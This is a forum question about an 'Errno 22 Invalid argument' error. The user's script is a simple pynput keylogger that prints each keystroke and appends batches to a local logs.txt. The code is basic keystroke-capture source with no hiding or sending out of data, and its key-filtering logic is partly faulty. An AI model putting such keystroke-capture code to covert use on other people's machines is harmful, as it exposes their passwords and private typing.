# Errno 22 Invalid argument error when executing python program

Tags: python, windows

While trying to make a keylogger via python, I came across the following error

```
C:\Users\tahas\AppData\Local\Programs\Python\Python310\python.exe: can't open file 'c:\\Users\\tahas\\OneDrive\\Masaüstü\\AS\\keylogger.py': 
[Errno 22] Invalid argument
```

```
from pynput.keyboard import Key, Listener

"""
  key -> klavye tuşu (esc, space , enter.......)
  listener -> klavyeyi dinleyen fonksiyon
"""

count = 0
keys = []

def on_press(key):
    global keys, count
    keys.append(key)
    count += 1
    print("{} tuşuna basıldı!".format(str(key)))
    
    if count >10:
        write_file(keys)
        keys= []
        count = 0

def write_file(keys):
   with open("logs.txt", "a") as file:
          for key in keys:
              k = str(key).replace("'", "")
              if k.find("space") > 0:
                  file.write("\n")
              elif k.find("Key"):
                  file.write(str(key))

def on_release(key):


 if key == Key.esc:
    return False

with Listener(on_press = on_press, on_release = on_release) as listener:
    listener.join()
```

i don't know why i can't open the file can you help me

Comment: Can you please [edit] to show how you're trying to run the script? Is it from command line, in a bash script, some other way?

Comment: what is the error message that you are getting please ?